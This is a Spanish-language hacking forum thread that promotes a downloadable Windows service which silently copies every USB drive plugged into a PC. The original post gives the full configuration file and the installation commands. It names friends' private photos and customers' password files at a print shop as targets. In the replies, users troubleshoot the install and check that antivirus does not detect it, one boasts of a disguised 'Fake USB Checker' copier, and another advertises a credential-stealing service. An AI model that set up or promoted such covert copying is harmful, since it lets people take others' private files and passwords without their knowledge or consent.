Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Silent USB Copy, Roba datos de USBs que se conectan a tu PC

  • 16 Respuestas
  • 9232 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Conectado 79137913

« en: Agosto 03, 2017, 01:11:22 pm »
HOLA!!!

Zilog80 USB 'silent' USB copier
 
#1) Que hace?
Z80USBCopier es un Servicio de Windows que copia la informacion en discos insertados a tu HDD.
 
#2) Ejemplos de Uso
Ejemplo #1:
Imaginate que alguien te pide imprimir algo, Insertas el USB de tu amigo(o victima  ;D) y la PC automaticamente empieza a copiar todo a tu HDD.
Imaginate que tiene en el usb la siguiente carpeta E:\Vacaciones\2016\Ibiza\Pacha\Hot\wtf_0001.jpgE:\Vacaciones\2016\Ibiza\Pacha\Hot\wtf_0002.jpg,  ... (espero que entiendas)
Sin que tu "amigo" sepa que copiaste esas fotos.
 
Ejemplo #2:
Tenes una libreria o lugar donde la gente vaya a imprimir cosas y uno de los usb que copiaste tiene lo siguiente: E:\Audio\RollingStones\Album Desconocido\Pista1\accountPasswords.txt
Que pensas que es  accountPasswords.txt? JAJAJA
 
Ejemplo #3:
Tenes tu propio USB y sin querer lo formateas o le pasa algo,tenes un "backup" en tu pc ;)

#3) Como funciona?
Es un servicio de windows, no necesita ningun tipo de interaccion.
 

 
Se maneja el funcionamiento dentro de el archivo Config.ini que esta bien comentado y es facil de modificar.
Config INI:
 
Código: [Seleccionar]
; Z80 USB Copier config file
 
[Extensions]
; Si CopyAnyExtensionFile=1 se copian todos los archivos y CopyOnlyFilesWithExtension es omitido
CopyAnyExtensionFile=0
CopyOnlyFilesWithExtension=accdb,avi,bmp,css,dll,doc,docx,exe,gif,htm,html,ico,ini,jpeg,jpg,log,mdb,mov,mp3,mp4,msi,ogg,pdf,png,rar,sql,txt,wav,xls,xlsx,xps,zip

; Ejemplos de Extensiones:
; Imagenes:
;CopyOnlyFilesWithExtension=bmp,gif,ico,jpeg,jpg,png
; Documentos:
;CopyOnlyFilesWithExtension=accdb,doc,docx,mdb,pdf,txt,xls,xlsx,xps
; Ejecutables y Comprimidos:
;CopyOnlyFilesWithExtension=exe,msi,rar,zip
; Audio y Video:
;CopyOnlyFilesWithExtension=avi,mov,mp3,mp4,ogg,wav,wma
 
[SizeLimit]
; CopyAnySize=0 copia solo el intervalo entre MinSize y MaxSize 1=Se copian todos los tamaños y se omiten MinSize / MaxSize
CopyAnySize=0
; Sufijos: B (bytes), KB (KiloBytes), MB (MegaBytes)
MinSize=0B   
MaxSize=10MB
 
[DestinationFolder]
; Se copiara a la carpeta que este especificada, %ApplicationStartupPath% es la carpeta donde se instalo el sistema.
; Tambien podes poner una carpeta especifica: C:\carpeta1\carpeta2
RootFolder=%ApplicationStartupPath%
; If you are copying J:\ USB the hierarchy will be:
; RootFolder\yyyyMMdd\HHmmss_J\
;RemoveEmptyFolders=0 al terminar de copiar no hace nada, 1= al terminar de copiar busca carpetas vacias y las borra de la carpeta de destino
RemoveEmptyFolders=0
 
[ExculdeCopyDrives]
; Excluded=0(todos los discos se copiaran) 1=los discos en la variable Drives se excluiran.
Excluded=0
Drives=E,G,J
 
[Debug]
; Values=0 (no hace logs) 1=hace un log en RootFolder\yyyyMMdd\HHmmss_X_log.txt con los archivos salteados
SaveSkippedToLog=1

#4) Cuanto tarda?
Depende si es un USB un disco externo o es un cd, pero aqui una prueba: USB 1.0, 80 MB (196 archivos y 19 carpetas/subcarpetas) de USB a HDD ( no SSD) toma 20 segundos (Windows 10)
 
#5) Como lo instalo?
En el comprimido tenes todo lo que necesitas
1)descomprimis en la carpeta donde quieras que quede (es importante saber que el servicio se instalara ahi y no lo podras sacar, por ende no lo instales en el escritorio por ejemplo)
2)abris un CMD con privilegios de Administrador y navegas a la carpeta que descomprimiste.
3) tipeas estos comandos:
 
Código: [Seleccionar]
installutil.exe Z80USBCopier.exe
net start Z80USBSvc

P.D: es necesario que tengan instalado NET FRAMEWORK 4

DESCARGA

A disfrutar!

Gracias a Zilog80

GRACIAS POR LEER!!!
"Algunos creen que soy un bot, puede que tengan razon"
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

*Shadow Scouts Team*                                                   DOORS.PARTY

Desconectado Blest777

  • *
  • Underc0der
  • Mensajes: 63
  • Actividad:
    0%
  • Reputación 0
  • Todo es vanidad.
    • Ver Perfil
« Respuesta #1 en: Agosto 10, 2017, 12:30:14 pm »
Saludos

Seguí el tutorial y no me funcionó. Tengo Windows 7 Starter, 32bits.

Tengo instalado correctamente el Net Framework 4. Incluso lo desintalé e instalé de nuevo el Net Framework.

Aquí te muestro el error:

... De las piedras y el aire no proviene el concepto de lo que es bueno y lo que es malo, de la no vida no puede surgir vida.

Conectado 79137913

« Respuesta #2 en: Agosto 10, 2017, 01:34:35 pm »
HOLA!!!

Intenta seguir esta guia:
http://rockpaperweb.com/install-windows-service-without-visual-studio/

GRACIAS POR LEER!!!
"Algunos creen que soy un bot, puede que tengan razon"
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

*Shadow Scouts Team*                                                   DOORS.PARTY

Desconectado JoxM

  • *
  • Underc0der
  • Mensajes: 9
  • Actividad:
    0%
  • Reputación 0
  • Nada siempre es algo
    • Ver Perfil
    • Email
  • Skype: JoxMarkes
« Respuesta #3 en: Agosto 12, 2017, 08:22:12 am »
Yo en su día cree una app que se llamaba Fake USB Checker, que simulaba un analisis al pendrive nada más conectarlo, mientras lo que hacía era copiar todo. Lo liberé en un foro de la Deepweb y tuvo mucho éxito, haber si lo vuelvo a compilar y os lo dejo por aquí.

saludos.
Sistema indetectable para obtener credenciales. Contacta conmigo y te hago una demo.

Desconectado DUDA

  • *
  • Underc0der
  • Mensajes: 334
  • Actividad:
    0%
  • Reputación 1
  • Hago pocas cosas, pero las hago bien.
    • Ver Perfil
« Respuesta #4 en: Agosto 16, 2017, 01:36:04 pm »
Yo en su día cree una app que se llamaba Fake USB Checker, que simulaba un analisis al pendrive nada más conectarlo, mientras lo que hacía era copiar todo. Lo liberé en un foro de la Deepweb y tuvo mucho éxito, haber si lo vuelvo a compilar y os lo dejo por aquí.

saludos.

Espero tu aporte.

@79137913 aplica para móviles android?

Conectado 79137913

« Respuesta #5 en: Agosto 16, 2017, 01:53:10 pm »
HOLA!!!

Siempre y cuando se monten con una unidad de letra basica (es decir a: b: c: d: e: f: g: etc) se copiaran los archivos.

GRACIAS POR LEER!!!
"Algunos creen que soy un bot, puede que tengan razon"
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

*Shadow Scouts Team*                                                   DOORS.PARTY

Desconectado ronluas

  • *
  • Underc0der
  • Mensajes: 118
  • Actividad:
    20%
  • Reputación 2
    • Ver Perfil
« Respuesta #6 en: Septiembre 03, 2017, 10:17:05 am »
Yo en su día cree una app que se llamaba Fake USB Checker, que simulaba un analisis al pendrive nada más conectarlo, mientras lo que hacía era copiar todo. Lo liberé en un foro de la Deepweb y tuvo mucho éxito, haber si lo vuelvo a compilar y os lo dejo por aquí.

saludos.
Espero tu aporte y explición de su funcionamiento mi amigo  ;)

Desconectado DinamicoBoys

  • *
  • Underc0der
  • Mensajes: 6
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #7 en: Octubre 03, 2017, 06:28:29 am »
Lo probare, acabo de pasarlo por  viruscheckmate , parece estar bien limpio,  a probar en una maquina con el AV que deseo :)

Les dejo el link --> https://viruscheckmate.com/id/0hWhfbZh3wIL

EDIT: Joder necesito privilegios de administrador y no tengo la contraseña :v .. ademas que usa kaspersky, por eso no me sirve el resto de archivos que tengo..
« Última modificación: Octubre 03, 2017, 06:37:09 am por DinamicoBoys »

Desconectado borntoberocker

  • *
  • Underc0der
  • Mensajes: 11
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #8 en: Octubre 25, 2017, 05:22:55 pm »
Yo en su día cree una app que se llamaba Fake USB Checker, que simulaba un analisis al pendrive nada más conectarlo, mientras lo que hacía era copiar todo. Lo liberé en un foro de la Deepweb y tuvo mucho éxito, haber si lo vuelvo a compilar y os lo dejo por aquí.

saludos.
hola, prodrias resubir la app por favor?

Desconectado Brittsman97

  • *
  • Underc0der
  • Mensajes: 13
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #9 en: Octubre 30, 2017, 12:15:23 pm »
Hola! excelente aporte @79137913
a la hora de escribir los comandos me sale este error:

¿Qué debo hacer?
Muchas gracias.

Conectado 79137913

« Respuesta #10 en: Octubre 30, 2017, 12:21:55 pm »
HOLA!!!

instala la última versión de net framework.

Con eso debería andar

GRACIAS POR LEER!!!
"Algunos creen que soy un bot, puede que tengan razon"
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

*Shadow Scouts Team*                                                   DOORS.PARTY

Conectado UpecBlack

  • *
  • Underc0der
  • Mensajes: 70
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #11 en: Octubre 30, 2017, 06:16:20 pm »
excelente me funciono a la perfeccion en windows 7 ultimate de 64 bits , windows 8.1 pro  y windows 10 enterprite , por cierto el amigo de la deepweb  no subira el aporte xD

Desconectado Brittsman97

  • *
  • Underc0der
  • Mensajes: 13
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #12 en: Octubre 31, 2017, 04:29:43 pm »
@79137913 Hola!
sigue sin funcionarme, me muestra el mismo error. Alguna solución??
Tengo windows 10 creators update, la última...
saludos

Conectado 79137913

« Respuesta #13 en: Noviembre 01, 2017, 08:39:14 am »
HOLA!!!

Es extraño, no lo he testeado en ese so pero debería funcionar, tenes privilegios de administrador? La cmd que abris tiene privilegios de administrador? Revisa eso.


GRACIAS POR LEER!!!
"Algunos creen que soy un bot, puede que tengan razon"
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

*Shadow Scouts Team*                                                   DOORS.PARTY

Desconectado Brittsman97

  • *
  • Underc0der
  • Mensajes: 13
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #14 en: Noviembre 04, 2017, 07:26:41 am »
HOLA!!!

Es extraño, no lo he testeado en ese so pero debería funcionar, tenes privilegios de administrador? La cmd que abris tiene privilegios de administrador? Revisa eso.


GRACIAS POR LEER!!!


Hola de nuevo @79137913 , sí he iniciado la consola con privilegios de administrador. También he buscado información sobre el error pero no encuentro nada para solucionarlo...
Gracias!

Desconectado kr0m

  • *
  • Underc0der
  • Mensajes: 1
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • AlfaExploit
« Respuesta #15 en: Noviembre 13, 2017, 03:57:18 pm »
En este artículo explico la misma juagada pero bajo Linux utilizando reglas udev:
http://www.alfaexploit.com/readArticle/148

Espero que sirva ;)

Desconectado MrKrypton

  • *
  • Underc0der
  • Mensajes: 10
  • Actividad:
    0%
  • Reputación 1
  • Un Soldado Da Tiros Y Un Hacker Da Enter
    • Ver Perfil
    • Email
« Respuesta #16 en: Febrero 24, 2018, 05:34:50 pm »
Jajajaj que buena informacion +10

 

¿Te gustó el post? COMPARTILO!



Tutorial - "Recuperar datos borrados dispositivo almacenamiento"

Iniciado por Cl0udswX

Respuestas: 7
Vistas: 6567
Último mensaje Octubre 22, 2017, 04:27:09 pm
por b4r7
Hacking Vulnerabilidades de seguridad de Miles de bases de datos expuestas!!!!

Iniciado por NSA17

Respuestas: 0
Vistas: 2580
Último mensaje Febrero 22, 2019, 02:02:13 pm
por NSA17
Google groups expone cientos de datos de sus usuarios por defecto

Iniciado por Rootkit_Pentester

Respuestas: 0
Vistas: 1832
Último mensaje Julio 27, 2018, 03:23:43 pm
por Rootkit_Pentester
Protege la configuración de google groups por defecto o no filtres tus datos!!!

Iniciado por Rootkit_Pentester

Respuestas: 0
Vistas: 2301
Último mensaje Agosto 02, 2017, 11:59:41 pm
por Rootkit_Pentester
Base de Datos con pyrit para atacar WPA/WPA2

Iniciado por t0n4

Respuestas: 5
Vistas: 5892
Último mensaje Diciembre 27, 2017, 03:00:29 pm
por nachfuentes